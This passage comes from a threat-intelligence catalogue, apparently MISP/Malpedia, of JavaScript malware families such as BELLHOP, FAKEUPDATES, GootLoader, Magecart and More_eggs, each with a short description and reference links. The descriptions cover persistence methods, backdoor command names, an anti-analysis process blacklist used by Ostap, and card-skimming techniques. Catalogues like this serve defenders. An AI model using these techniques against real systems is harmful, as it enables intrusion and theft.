https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak

https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html

http://www.kahusecurity.com/posts/reflow_javascript_backdoor.html

https://www.secureworks.com/research/threat-profiles/bronze-mohawk

BeaverTail

The tag is: misp-galaxy:malpedia="BeaverTail"

BeaverTail is also known as:

Table 2552. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.beavertail

https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/

BELLHOP

  • BELLHOP is a JavaScript backdoor interpreted using the native Windows Scripting Host(WSH). After performing some basic host information gathering, the BELLHOP dropper downloads a base64-encoded blob of JavaScript to disk and sets up persistence in three ways:

  • Creating a Run key in the Registry

  • Creating a RunOnce key in the Registry

  • Creating a persistent named scheduled task

  • BELLHOP communicates using HTTP and HTTPS with primarily benign sites such as Google Docs and PasteBin.

The tag is: misp-galaxy:malpedia="BELLHOP"

BELLHOP is also known as:

Table 2553. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.bellhop

https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

ChromeBack

GoSecure describes ChromeBack as a browser hijacker, redirecting traffic and serving advertisements to users.

The tag is: misp-galaxy:malpedia="ChromeBack"

ChromeBack is also known as:

Table 2555. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.chromeback

https://unit42.paloaltonetworks.com/chromeloader-malware/

https://www.gosecure.net/blog/2022/02/10/malicious-chrome-browser-extension-exposed-chromeback-leverages-silent-extension-loading/

ClearFake

ClearFake is a malicious JavaScript framework deployed on compromised websites to deliver further malware using the drive-by download technique. The malware leverages social engineering to trick the user into running a fake web browser update.

The tag is: misp-galaxy:malpedia="ClearFake"

ClearFake is also known as:

Table 2556. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.clearfake

https://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/

https://rmceoin.github.io/malware-analysis/clearfake/

CryptoNight

WebAssembly-based crpyto miner.

The tag is: misp-galaxy:malpedia="CryptoNight"

CryptoNight is also known as:

Table 2557. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.cryptonight

https://twitter.com/JohnLaTwC/status/983011262731714565

https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec

DarkWatchman

Prevailion found this RAT written in JavaScript, which dynamically compiles an accompanying keylogger written in C# and uses a DGA für C&C.

The tag is: misp-galaxy:malpedia="DarkWatchman"

DarkWatchman is also known as:

Table 2559. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.darkwatchman

https://www.prevailion.com/darkwatchman-new-fileness-techniques/

https://securityintelligence.com/posts/hive00117-fileless-malware-delivery-eastern-europe/

doenerium

Open sourced javascript info stealer, with the capabilities of stealing crypto wallets, password, cookies and modify discord clients https://github.com/doener2323/doenerium

The tag is: misp-galaxy:malpedia="doenerium"

doenerium is also known as:

Table 2561. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.doenerium

https://twitter.com/0xToxin/status/1572612089901993985

https://perception-point.io/doenerium-malware/

Enrume

The tag is: misp-galaxy:malpedia="Enrume"

Enrume is also known as:

  • Ransom32

Table 2562. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.enrume

https://blog.emsisoft.com/de/21077/meet-ransom32-the-first-javascript-ransomware/

FakeUpdateRU

FakeUpdateRU is a malicious JavaScript code injected into compromised websites to deliver further malware using the drive-by download technique. The malicious code displays a copy of the Google Chrome web browser download page and redirects the user to the download of a next-stage payload.

The tag is: misp-galaxy:malpedia="FakeUpdateRU"

FakeUpdateRU is also known as:

Table 2564. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.fakeupdateru

https://blog.sucuri.net/2023/10/fakeupdateru-chrome-update-infection-spreads-trojan-malware.html

FAKEUPDATES

FAKEUPDATES is a downloader written in JavaScript that communicates via HTTP. Supported payload types include executables and JavaScript. It writes the payloads to disk prior to launching them. FAKEUPDATES has led to further compromise via additional malware families that include CHTHONIC, DRIDEX, EMPIRE, KOADIC, DOPPELPAYMER, and AZORULT.

FAKEUPDATES has been heavily used by UNC1543,a financially motivated group.

The tag is: misp-galaxy:malpedia="FAKEUPDATES"

FAKEUPDATES is also known as:

  • FakeUpdate

  • SocGholish

Table 2565. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.fakeupdates

https://www.lac.co.jp/lacwatch/report/20220407_002923.html

http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://experience.mandiant.com/trending-evil/p/1

https://twitter.com/MsftSecIntel/status/1522690116979855360

https://blog.sucuri.net/2022/08/socgholish-5-years-of-massive-website-infections.html

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack

https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf

https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/

https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems

https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html

https://www.digitalinformationworld.com/2022/04/threatening-redirect-web-service.html

https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/

https://killingthebear.jorgetesta.tech/actors/evil-corp

https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee

https://www.menlosecurity.com/blog/increase-in-attack-socgholish

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt

https://www.mandiant.com/resources/they-come-in-the-night-ransomware-deployment-trends

https://blog.malwarebytes.com/threat-intelligence/2022/06/makemoney-malvertising-campaign-adds-fake-update-template/

https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/

https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm

https://www.sentinelone.com/labs/socgholish-diversifies-and-expands-its-malware-staging-infrastructure-to-counter-defenders/

https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://expel.io/blog/incident-report-spotting-socgholish-wordpress-injection/

GootLoader

According to PCrisk, they discovered GootLoader malware while examining legitimate but compromised websites (mainly websites managed using WordPress). It was found that GootLoader is used to infect computers with additional malware. Cybercriminals using GootLoader seek to trick users into unknowingly downloading and executing the malware by disguising it as a document or other file.

The tag is: misp-galaxy:malpedia="GootLoader"

GootLoader is also known as:

Table 2566. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.gootloader

https://dinohacks.blogspot.com/2022/06/loading-gootloader.html

https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf

https://www.esentire.com/blog/gootloader-leads-to-cobalt-strike-and-hand-on-keyboard-activity

https://socradar.io/new-gootloader-variant-gootbot-changes-the-game-in-malware-tactics/

https://gootloader.wordpress.com/2023/01/05/what-is-gootloader/

https://www.esentire.com/web-native-pages/gootloader-unloaded

https://experience.mandiant.com/trending-evil/p/1

https://labs.sentinelone.com/gootloader-initial-access-as-a-service-platform-expands-its-search-for-high-value-targets/

https://github.com/struppigel/hedgehog-tools/tree/main/gootloader

https://securityintelligence.com/x-force/gootbot-gootloaders-new-approach-to-post-exploitation/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/gootloader-why-your-legal-document-search-may-end-in-misery/

https://blogs.blackberry.com/en/2022/07/gootloader-from-seo-poisoning-to-multi-stage-downloader

https://redcanary.com/blog/gootloader

https://community.riskiq.com/article/f5d5ed38

https://gootloader.wordpress.com/2023/01/05/gootloader-command-control/

https://www.kroll.com/en/insights/publications/cyber/deep-dive-gootloader-malware-infection-chain

https://web.archive.org/web/20230209123148/https://www.cybereason.com/hubfs/THREAT%20ALERT%20GootLoader%20-%20Large%20payload%20leading%20to%20compromise%20(BLOG).pdf

https://www.mandiant.com/resources/blog/tracking-evolution-gootloader-operations

https://www.trendmicro.com/en_us/research/23/a/gootkit-loader-actively-targets-the-australian-healthcare-indust.html

https://www.reliaquest.com/blog/gootloader-infection-credential-access/

https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/

https://threatresearch.ext.hp.com/tips-for-automating-ioc-extraction-from-gootloader-a-changing-javascript-malware/

https://www.esentire.com/blog/gootloader-striking-with-a-new-infection-technique

https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/

https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/

grelos

grelos is a skimmer used for magecart-style attacks.

The tag is: misp-galaxy:malpedia="grelos"

grelos is also known as:

Table 2567. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.grelos

https://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745

https://community.riskiq.com/article/8c4b4a7a

https://www.riskiq.com/blog/labs/magecart-medialand/

Griffon

GRIFFON is a lightweight JavaScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JavaScript, which allows the cybercriminals to understand the context of the infected workstation.

The tag is: misp-galaxy:malpedia="Griffon"

Griffon is also known as:

  • Harpy

Table 2568. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf

https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://www.secureworks.com/research/threat-profiles/gold-niagara

https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape

https://www.mandiant.com/resources/evolution-of-fin7

https://twitter.com/ItsReallyNick/status/1059898708286939136

inter

The tag is: misp-galaxy:malpedia="inter"

inter is also known as:

Table 2569. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.inter

https://www.fortinet.com/blog/threat-research/inter-skimmer-for-all.html

Jeniva

The tag is: misp-galaxy:malpedia="Jeniva"

Jeniva is also known as:

Table 2570. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.jeniva

https://imp0rtp3.wordpress.com/2021/08/12/tetris/

Jetriz

The tag is: misp-galaxy:malpedia="Jetriz"

Jetriz is also known as:

Table 2571. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.jetriz

https://imp0rtp3.wordpress.com/2021/08/12/tetris/

LNKR

The LNKR trojan is a malicious browser extension that will monitor the websites visited by the user, looking for pages with administrative privileges such as blog sites or web-based virtual learning environments. When the administrative user posts to the page, the infected extension will execute stored cross-site scripting attack and injects malicious JavaScript into the legitimate HTML of the page. This is used to redirect the second-party visitors of the site to both benign and malicious domains.

The tag is: misp-galaxy:malpedia="LNKR"

LNKR is also known as:

Table 2574. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.lnkr

https://github.com/Zenexer/lnkr

https://krebsonsecurity.com/2020/03/the-case-for-limiting-your-browser-extensions/

https://github.com/Zenexer/lnkr/blob/master/recon/extensions/fanagokoaogopceablgmpndejhedkjjb/README.md

https://www.riskiq.com/blog/labs/lnkr-browser-extension/

magecart

Magecart is a malware framework intended to steal credit card information from compromised eCommerce websites. Used in criminal activities, it’s a sophisticated implant built on top of relays, command and controls and anonymizers used to steal eCommerce customers' credit card information. The first stage is typically implemented in Javascript included into a compromised checkout page. It copies data from "input fields" and send them to a relay which collects credit cards coming from a subset of compromised eCommerces and forwards them to Command and Control servers.

The tag is: misp-galaxy:malpedia="magecart"

magecart is also known as:

Table 2575. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart

https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html

https://blog.trendmicro.com/trendlabs-security-intelligence/us-local-government-services-targeted-by-new-magecart-credit-card-skimming-attack/

https://community.riskiq.com/article/14924d61

https://scotthelme.co.uk/introducing-script-watch-detect-magecart-style-attacks-fast/?utm_source=dlvr.it&utm_medium=twitter

https://geminiadvisory.io/magecart-google-tag-manager/

https://www.perimeterx.com/blog/analyzing_magecart_malware_from_zero_to_hero/

https://geminiadvisory.io/wp-content/uploads/2020/07/Appendix-C-1.pdf

https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/

https://sansec.io/research/magecart-corona-lockdown

https://twitter.com/AffableKraut/status/1385030485676544001

https://sansec.io/research/magento-2-persistent-parasite

https://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html

https://go.recordedfuture.com/hubfs/reports/cta-2022-0719.pdf

https://twitter.com/MBThreatIntel/status/1416101496022724609

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://twitter.com/AffableKraut/status/1415425132080816133?s=20

https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/

https://www.goggleheadedhacker.com/blog/post/14

https://blog.sucuri.net/2021/07/magecart-swiper-uses-unorthodox-concatenation.html

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.reflectiz.com/ico-fines-ticketmaster-uk-1-25-million-for-security-failures-a-lesson-to-be-learned/

https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/

https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/

https://blog.malwarebytes.com/threat-intelligence/2021/09/the-many-tentacles-of-magecart-group-8/

https://blog.malwarebytes.com/cybercrime/2019/04/github-hosted-magecart-skimmer-used-against-hundreds-of-e-commerce-sites/

https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf

https://blog.trendmicro.com/trendlabs-security-intelligence/magecart-skimming-attack-targets-mobile-users-of-hotel-chain-booking-websites/

https://www.riskiq.com/blog/labs/magecart-group-12-olympics/

https://community.riskiq.com/article/fda1f967

https://blog.malwarebytes.com/cybercrime/2021/06/lil-skimmer-the-magecart-impersonator/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/injecting-magecart-into-magento-global-config/

https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer-hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/

https://medium.com/reflectiz/csp-the-right-solution-for-the-web-skimming-pandemic-acb7a4414218

https://www.riskiq.com/blog/labs/magecart-nutribullet/

https://community.riskiq.com/article/743ea75b/description

https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/

https://maxkersten.nl/2020/01/20/ticket-resellers-infected-with-a-credit-card-skimmer/

https://www.zdnet.com/article/web-skimmers-found-on-the-websites-of-intersport-claires-and-icing/

https://www.zscaler.com/blogs/security-research/black-friday-scams-4-emerging-skimming-attacks-watch-holiday-season

https://marcoramilli.com/2020/02/19/uncovering-new-magecart-implant-attacking-ecommerce/

https://blog.malwarebytes.com/cybercrime/2021/05/newly-observed-php-based-skimmer-shows-ongoing-magecart-group-12-activity/

https://community.riskiq.com/article/30f22a00

https://www.riskiq.com/blog/labs/magecart-medialand/

https://www.reflectiz.com/the-gocgle-web-skimming-campaign/

https://maxkersten.nl/2020/02/17/following-the-tracks-of-magecart-12/

https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html

https://sansec.io/research/north-korea-magecart

https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/

https://community.riskiq.com/article/2efc2782

https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf

https://community.riskiq.com/article/5bea32aa

https://community.riskiq.com/article/017cf2e6

https://blog.malwarebytes.com/threat-intelligence/2021/11/credit-card-skimmer-evades-virtual-machines/

https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/

https://securelist.com/apt-trends-report-q2-2019/91897/

https://www.riskiq.com/blog/labs/misconfigured-s3-buckets/

https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/

https://maxkersten.nl/2020/02/24/closing-in-on-magecart-12/

https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/

MiniJS

MiniJS is a very simple JavaScript-based first-stage backdoor. The backdoor is probably distributed via spearphishing email. Due to infrastructure overlap, the malware can be attributed to the actor Turla. Comparable JavaScript-based backdoor families of the actor are KopiLuwak and IcedCoffee.

The tag is: misp-galaxy:malpedia="MiniJS"

MiniJS is also known as:

Table 2576. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.minijs

https://www.virustotal.com/gui/file/0ce9aadf6a3ffd85d6189590ece148b2f9d69e0ce1c2b8eb61361eb8d0f98571/details

More_eggs

More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are: - d&exec = download and execute PE file - gtfo = delete files/startup entries and terminate - more_eggs = download additional/new scripts - more_onion = run new script and terminate current script - more_power = run command shell commands

The tag is: misp-galaxy:malpedia="More_eggs"

More_eggs is also known as:

  • SKID

  • SpicyOmelette

Table 2577. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://twitter.com/Arkbird_SOLG/status/1301536930069278727

https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/

https://attack.mitre.org/software/S0284/

https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware

https://github.com/eset/malware-ioc/tree/master/evilnum

https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw

https://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/

https://blog.morphisec.com/cobalt-gang-2.0

https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish

https://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing

http://www.secureworks.com/research/threat-profiles/gold-kingswood

https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf

https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html

https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/

https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/

https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://asert.arbornetworks.com/double-the-infection-double-the-fun/

https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers

https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/

https://www.esentire.com/web-native-pages/unmasking-venom-spider

https://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1

https://www.secureworks.com/research/threat-profiles/gold-kingswood

https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/

https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/

https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire

NanHaiShu

NanHaiShu is a remote access tool and JScript backdoor used by Leviathan. NanHaiShu has been used to target government and private-sector organizations that have relations to the South China Sea dispute.

The tag is: misp-galaxy:malpedia="NanHaiShu"

NanHaiShu is also known as:

Table 2578. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.nanhaishu

https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-social-engineering

https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets

https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf

https://attack.mitre.org/software/S0228/

ostap

Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes:

AgentSimulator.exe anti-virus.EXE BehaviorDumper BennyDB.exe ctfmon.exe fakepos_bin FrzState2k gemu-ga.exe (Possible misspelling of Qemu hypervisor’s guest agent, qemu-ga.exe) ImmunityDebugger.exe KMS Server Service.exe ProcessHacker procexp Proxifier.exe python tcpdump VBoxService VBoxTray.exe VmRemoteGuest vmtoolsd VMware2B.exe VzService.exe winace Wireshark

If a blacklisted process is found, the malware terminates.

Ostap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.

The tag is: misp-galaxy:malpedia="ostap"

ostap is also known as:

Table 2580. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.ostap

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://malfind.com/index.php/2021/11/24/from-the-archive-1-ostap-dropper-deobfuscation-and-analysis/

https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter

https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/

https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/deobfuscate_ostap.py

https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/

https://www.intrinsec.com/deobfuscating-hunting-ostap/

https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/

Parrot TDS

This malicious code written in JavaScript is used as Traffic Direction System (TDS). This TDS showes similarities to the Prometheus TDS. According to DECODED Avast.io this TDS has been active since October 2021.

The tag is: misp-galaxy:malpedia="Parrot TDS"

Parrot TDS is also known as:

Table 2582. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.parrot_tds

https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/

PeaceNotWar

PeaceNotWar was integrated into the nodejs module node-ipc as a piece of malware/protestware with wiper characteristics. It targets machines with a public IP address located in Russia and Belarus (using geolocation) and overwrites files recursively using a heart emoji.

The tag is: misp-galaxy:malpedia="PeaceNotWar"

PeaceNotWar is also known as:

Table 2583. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.peacenotwar

https://www.vice.com/en/article/dypeek/open-source-sabotage-node-ipc-wipe-russia-belraus-computers

https://www.bleepingcomputer.com/news/security/big-sabotage-famous-npm-package-deletes-files-to-protest-ukraine-war/

https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c

PindOS

The tag is: misp-galaxy:malpedia="PindOS"

PindOS is also known as:

Table 2584. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.pindos

https://www.deepinstinct.com/blog/pindos-new-javascript-dropper-delivering-bumblebee-and-icedid

QNodeService

According to Trend Micro, this is a Node.js based malware, that can download/upload/execute files, steal credentials from Chrome/Firefox browsers, and perform file management, among other things. It targets Windows and has components for both 32 and 64bit.

The tag is: misp-galaxy:malpedia="QNodeService"

QNodeService is also known as:

Table 2586. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.qnodeservice

https://www.telsy.com/wp-content/uploads/MAR_93433_WHITE.pdf

https://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/

QUICKCAFE

QUICKCAFE is an encrypted JavaScript downloader for QUICKRIDE.POWER that exploits the ActiveX M2Soft vulnerabilities. QUICKCAFE is obfuscated using JavaScript Obfuscator.

The tag is: misp-galaxy:malpedia="QUICKCAFE"

QUICKCAFE is also known as:

Table 2587. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.quickcafe

https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf

SQLRat

SQLRat campaigns typically involve a lure document that includes an image overlayed by a VB Form trigger. Once a user has double-clicked the embedded image, the form executes a VB setup script. The script writes files to the path %appdata%\Roaming\Microsoft\Templates\, then creates two task entries triggered to run daily. The scripts are responsible for deobfuscating and executing the main JavaScript file mspromo.dot. The file uses a character insertion obfuscation technique, making it appear to contain Chinese characters. After deobfuscating the file, the main JavaScript is easily recognizable. It contains a number of functions designed to drop files and execute scripts on a host system. The SQLRat script is designed to make a direct SQL connection to a Microsoft database controlled by the attackers and execute the contents of various tables.

The tag is: misp-galaxy:malpedia="SQLRat"

SQLRat is also known as:

Table 2589. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.sqlrat

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/

Starfighter (Javascript)

According to the author, this is a JavaScript based Empire launcher that runs with its own embedded powershell host to not be dependent on local powershell availability.

The tag is: misp-galaxy:malpedia="Starfighter (Javascript)"

Starfighter (Javascript) is also known as:

Table 2590. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.starfighter

https://github.com/Cn33liz/StarFighters

Swid

The tag is: misp-galaxy:malpedia="Swid"

Swid is also known as:

Table 2591. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.swid

https://imp0rtp3.wordpress.com/2021/08/12/tetris/

Maintools.js

Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'.

The tag is: misp-galaxy:malpedia="Maintools.js"

Maintools.js is also known as:

Table 2593. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_maintools

https://twitter.com/JohnLaTwC/status/915590893155098629

Unidentified JS 001 (APT32 Profiler)

The tag is: misp-galaxy:malpedia="Unidentified JS 001 (APT32 Profiler)"

Unidentified JS 001 (APT32 Profiler) is also known as:

Table 2594. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_001

https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef

https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f

Unidentified JS 003 (Emotet Downloader)

According to Max Kersten, Emotet is dropped by a procedure spanned over multiple stages. The first stage is an office file that contains a macro. This macro then loads the second stage, which is either a PowerShell script or a piece of JavaScript, which is this family entry.

The tag is: misp-galaxy:malpedia="Unidentified JS 003 (Emotet Downloader)"

Unidentified JS 003 (Emotet Downloader) is also known as:

Table 2595. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_003

https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-javascript-downloader/

Unidentified JS 004

A simple loader written in JavaScript found by Marco Ramilli.

The tag is: misp-galaxy:malpedia="Unidentified JS 004"

Unidentified JS 004 is also known as:

Table 2596. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_004

https://marcoramilli.com/2020/11/27/threat-actor-unkown/

Unidentified JS 005 (Stealer)

The tag is: misp-galaxy:malpedia="Unidentified JS 005 (Stealer)"

Unidentified JS 005 (Stealer) is also known as:

Table 2597. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_005

https://blogs.jpcert.or.jp/en/2021/07/water_pamola.html

Unidentified JS 006 (Winter Wyvern)

A script able to list folders and emails in the current Roundcube account, and to exfiltrate email messages to the C&C server by making HTTP requests.

The tag is: misp-galaxy:malpedia="Unidentified JS 006 (Winter Wyvern)"

